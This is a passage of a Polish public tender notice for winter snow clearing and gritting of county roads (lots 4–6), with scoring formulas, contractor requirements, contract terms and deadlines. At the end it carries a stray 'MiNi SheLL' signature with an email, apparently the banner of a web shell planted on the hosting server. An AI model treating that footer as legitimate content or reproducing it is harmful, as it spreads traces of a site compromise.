kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4 - obręb gminy Krzęcin<br/>Zakres robót obejmuje w szczególności:<br/>- odśnieżanie dróg powiatowych;<br/>- posypywanie nawierzchni dróg mieszanką piasku z solą lub solą;<br/>- gotowość do świadczenia usług: usuwanie gołoledzi i odśnieżania;<br/>- odśnieżanie dróg przy pomocy pracy koparko-ładowarki lub ładowarki lub innym sprzętem pomocniczym; Szczegółowy<br/>zakres ww. usług ujęty jest w arkuszu cenowym dla każdego zadania.<br/>Szczegółowe wykazy kilometrów dróg poszczególnych zadań (części) wyszczególniono w załączniku nr 8 niniejszej SWZ -<br/>Specyfikacje Techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów (suma 100%):<br/>• Cena max. - brutto 60 %<br/>• Czas reakcji – 40%<br/>1. Opis kryterium „cena”:<br/>C = (Cmin / Co) x 60% przy czym 1% = 1 punkt<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku. Liczba punktów w kryterium „cena” (C) zostanie obliczona na<br/>podstawie następującego wzoru:<br/>C = Cmin /Co x 60 pkt<br/>gdzie : Cmin - najniższa cena brutto spośród nieodrzuconych ofert <br/>Co - cena brutto oferty ocenianej spośród nieodrzuconych ofert<br/>W ramach tego kryterium Zamawiający będzie oceniał zaproponowany przez Wykonawcę „czas reakcji”, czyli wyrażony w minutach<br/>maksymalny czas, jaki może upłynąć od chwili wydania dyspozycji przez Zamawiającego lub od chwili wystąpienia niekorzystnych zjawisk pogodowych do momentu przystąpienia do świadczenia usług wymienionych w rozdz. 4 pkt. 2 w trakcie zimowego utrzymania dróg. W kryterium tym można uzyskać maksymalnie 40 punktów i będzie oceniane następująco:<br/> czas reakcji do 30 minut – 40 pkt.<br/> czas reakcji od 31 minut do 60 minut – 30 pkt.<br/> czas reakcji od 61 minut do 90 minut – 20 pkt<br/> czas reakcji od 91 minut do 120 minut – 10 pkt<br/> czas reakcji powyżej 120 minut - 0 pkt.<br/>Przyjmuje się, że w ww. punktacji: 1 pkt = 1%.<br/>Wykonawca zobowiązany jest dysponować sprzętem niezbędnym do realizacji zamówienia, gotowym do użycia w ciągu<br/>maksymalnie 180 minut od chwili otrzymania dyspozycji od dyżurnego PZD o konieczności podjęcia akcji na drodze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5- obręb gminy Pełczyce<br/>Zakres robót obejmuje w szczególności:<br/>- odśnieżanie dróg powiatowych;<br/>- posypywanie nawierzchni dróg mieszanką piasku z solą lub solą;<br/>- gotowość do świadczenia usług: usuwanie gołoledzi i odśnieżania;<br/>- odśnieżanie dróg przy pomocy pracy koparko-ładowarki lub ładowarki lub innym sprzętem pomocniczym; Szczegółowy<br/>zakres ww. usług ujęty jest w arkuszu cenowym dla każdego zadania.<br/>Szczegółowe wykazy kilometrów dróg poszczególnych zadań (części) wyszczególniono w załączniku nr 8 niniejszej SWZ -<br/>Specyfikacje Techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów (suma 100%):<br/>• Cena max. - brutto 60 %<br/>• Czas reakcji – 40%<br/>1. Opis kryterium „cena”:<br/>C = (Cmin / Co) x 60% przy czym 1% = 1 punkt<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku. Liczba punktów w kryterium „cena” (C) zostanie obliczona na<br/>podstawie następującego wzoru:<br/>C = Cmin /Co x 60 pkt<br/>gdzie : Cmin - najniższa cena brutto spośród nieodrzuconych ofert <br/>Co - cena brutto oferty ocenianej spośród nieodrzuconych ofert<br/>W ramach tego kryterium Zamawiający będzie oceniał zaproponowany przez Wykonawcę „czas reakcji”, czyli wyrażony w minutach<br/>maksymalny czas, jaki może upłynąć od chwili wydania dyspozycji przez Zamawiającego lub od chwili wystąpienia niekorzystnych zjawisk pogodowych do momentu przystąpienia do świadczenia usług wymienionych w rozdz. 4 pkt. 2 w trakcie zimowego utrzymania dróg. W kryterium tym można uzyskać maksymalnie 40 punktów i będzie oceniane następująco:<br/> czas reakcji do 30 minut – 40 pkt.<br/> czas reakcji od 31 minut do 60 minut – 30 pkt.<br/> czas reakcji od 61 minut do 90 minut – 20 pkt<br/> czas reakcji od 91 minut do 120 minut – 10 pkt<br/> czas reakcji powyżej 120 minut - 0 pkt.<br/>Przyjmuje się, że w ww. punktacji: 1 pkt = 1%.<br/>Wykonawca zobowiązany jest dysponować sprzętem niezbędnym do realizacji zamówienia, gotowym do użycia w ciągu<br/>maksymalnie 180 minut od chwili otrzymania dyspozycji od dyżurnego PZD o konieczności podjęcia akcji na drodze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 6 - obręb gminy Recz<br/>Zakres robót obejmuje w szczególności:<br/>- odśnieżanie dróg powiatowych;<br/>- posypywanie nawierzchni dróg mieszanką piasku z solą lub solą;<br/>- gotowość do świadczenia usług: usuwanie gołoledzi i odśnieżania;<br/>- odśnieżanie dróg przy pomocy pracy koparko-ładowarki lub ładowarki lub innym sprzętem pomocniczym; Szczegółowy<br/>zakres ww. usług ujęty jest w arkuszu cenowym dla każdego zadania.<br/>Szczegółowe wykazy kilometrów dróg poszczególnych zadań (części) wyszczególniono w załączniku nr 8 niniejszej SWZ -<br/>Specyfikacje Techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według następujących kryteriów (suma 100%):<br/>• Cena max. - brutto 60 %<br/>• Czas reakcji – 40%<br/>1. Opis kryterium „cena”:<br/>C = (Cmin / Co) x 60% przy czym 1% = 1 punkt<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia, podanej przez<br/>Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku. Liczba punktów w kryterium „cena” (C) zostanie obliczona na<br/>podstawie następującego wzoru:<br/>C = Cmin /Co x 60 pkt<br/>gdzie : Cmin - najniższa cena brutto spośród nieodrzuconych ofert <br/>Co - cena brutto oferty ocenianej spośród nieodrzuconych ofert<br/>W ramach tego kryterium Zamawiający będzie oceniał zaproponowany przez Wykonawcę „czas reakcji”, czyli wyrażony w minutach<br/>maksymalny czas, jaki może upłynąć od chwili wydania dyspozycji przez Zamawiającego lub od chwili wystąpienia niekorzystnych zjawisk pogodowych do momentu przystąpienia do świadczenia usług wymienionych w rozdz. 4 pkt. 2 w trakcie zimowego utrzymania dróg. W kryterium tym można uzyskać maksymalnie 40 punktów i będzie oceniane następująco:<br/> czas reakcji do 30 minut – 40 pkt.<br/> czas reakcji od 31 minut do 60 minut – 30 pkt.<br/> czas reakcji od 61 minut do 90 minut – 20 pkt<br/> czas reakcji od 91 minut do 120 minut – 10 pkt<br/> czas reakcji powyżej 120 minut - 0 pkt.<br/>Przyjmuje się, że w ww. punktacji: 1 pkt = 1%.<br/>Wykonawca zobowiązany jest dysponować sprzętem niezbędnym do realizacji zamówienia, gotowym do użycia w ciągu<br/>maksymalnie 180 minut od chwili otrzymania dyspozycji od dyżurnego PZD o konieczności podjęcia akcji na drodze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wyznacza warunki udziału w postępowaniu (art. 112 Pzp), dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunków w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunków w tym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunków w tym zakresie,<br/>4) zdolności technicznej lub zawodowej: o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają niezbędną zdolność techniczną, na dowód czego przedłożą wykaz narzędzi i urządzeń technicznych koniecznych do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - w szczególności należy dysponować sprzętem: 1 szt. nośnik z piaskarką, 1 szt. nośnik z pługiem odśnieżnym, pozostały sprzęt pomocniczy (2 szt.) wg. Rozdziału 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej<br/>Zamawiający żąda złożenia wykazu narzędzi i urządzeń technicznych koniecznych do realizacji zamówienia wraz z informacją o<br/>podstawie dysponowania tymi zasobami (wzór zał. Nr 6 SWZ). Zamawiający uzna warunek za spełniony, jeżeli ze złożonego wykazu, o którym mowa w niniejszym punkcie będzie wynikało, że dysponuje lub będzie dysponował następującym sprzętem (dla każdej części odrębnie): 1 szt. nośnik z piaskarką, 1 szt. nośnik z pługiem odśnieżnym, 2 szt. sprzęt dodatkowy (koparka, koparkoładowarka itp.)<br/>3. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w niniejszym punkcie, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w niniejszym punkcie, Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy zgodnie z wymogami określonymi w rozdz. 10.A SWZ.<br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składa dokumenty zgodnie z Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz.U. 2020 r., poz. 2415). - Rozdział 10 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda złożenia oświadczenia od Wykonawcy, w<br/>zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r.o ochronie konkurencji i konsumentów (tj. Dz.U. z 2021r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykaz wymaganych oświadczeń i dokumentów opisano w Rozdziale 10 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo), chyba że w przypadku spółki cywilnej, z<br/>umowy tej spółki wynika sposób jej reprezentowania (do stwierdzenia czego niezbędne będzie załączenie do oferty umowy spółki cywilnej). Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie.<br/>Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonania zmiany zawartej umowy:<br/>a) w przypadku zmiany obowiązującej stawki podatku VAT za wykonanie usług będących przedmiotem niniejszej umowy. W takim przypadku zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę podatku VAT.<br/>b) z powodu zaistniałej omyłki pisarskiej lub rachunkowej,<br/>c) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, które zaakceptuje (na piśmie) Zamawiający,<br/>d) z powodu zmiany zakresu przedmiotu zamówienia zleconego Wykonawcy oraz zmiany terminu wykonania przedmiotu umowy (tj. wydłużenia lub skrócenia) wynikających z konieczności uwzględnienia warunków atmosferycznych po wszczęciu niniejszego postępowania.<br/>e) zmiany właściciela firmy, oraz innych nieistotnych zmian dokonanych na wniosek Zamawiającego lub Wykonawcy,<br/>f) siły wyższej.<br/>Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór umowy, który stanowi załącznik nr 4 do niniejszej SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzdchoszczno.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-04 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com